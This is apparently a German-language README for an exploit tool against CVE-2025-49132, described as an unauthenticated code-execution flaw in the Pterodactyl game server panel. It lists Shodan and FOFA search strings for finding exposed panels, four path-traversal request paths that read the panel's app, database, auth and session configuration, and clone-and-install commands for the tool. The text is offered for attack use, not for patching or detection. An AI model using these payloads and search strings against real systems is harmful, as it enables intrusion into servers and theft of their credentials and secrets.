
Exploit-Tool für CVE-2025-49132 — eine kritische, nicht authentifizierte Schwachstelle zur Ausführung beliebigen Codes, die das Pterodactyl-Spielserver-Panel betrifft.
Ein kritischer ACE-Fehler im Pterodactyl-Panel, der es nicht authentifizierten Remote-Angreifern ermöglicht, beliebigen Code auszuführen — was potenziell zu einer vollständigen Systemkompromittierung führt.
Keine Authentifizierung erforderlich. Nur eine verwundbare Instanz.
Shodan
http.title:"Pterodactyl"
FOFA
"Pterodactyl"
locales/locale.json?locale=../../../pterodactyl&namespace=config/app
locales/locale.json?locale=../../../pterodactyl&namespace=config/database
locales/locale.json?locale=../../../pterodactyl&namespace=config/auth
locales/locale.json?locale=../../../pterodactyl&namespace=config/session
git clone https://github.com/yurahshell/CVE-2025-49132
cd CVE-2025-49132
pip install -r requirements.txt
| Software | Status |
|---|---|
| Pterodactyl-Panel |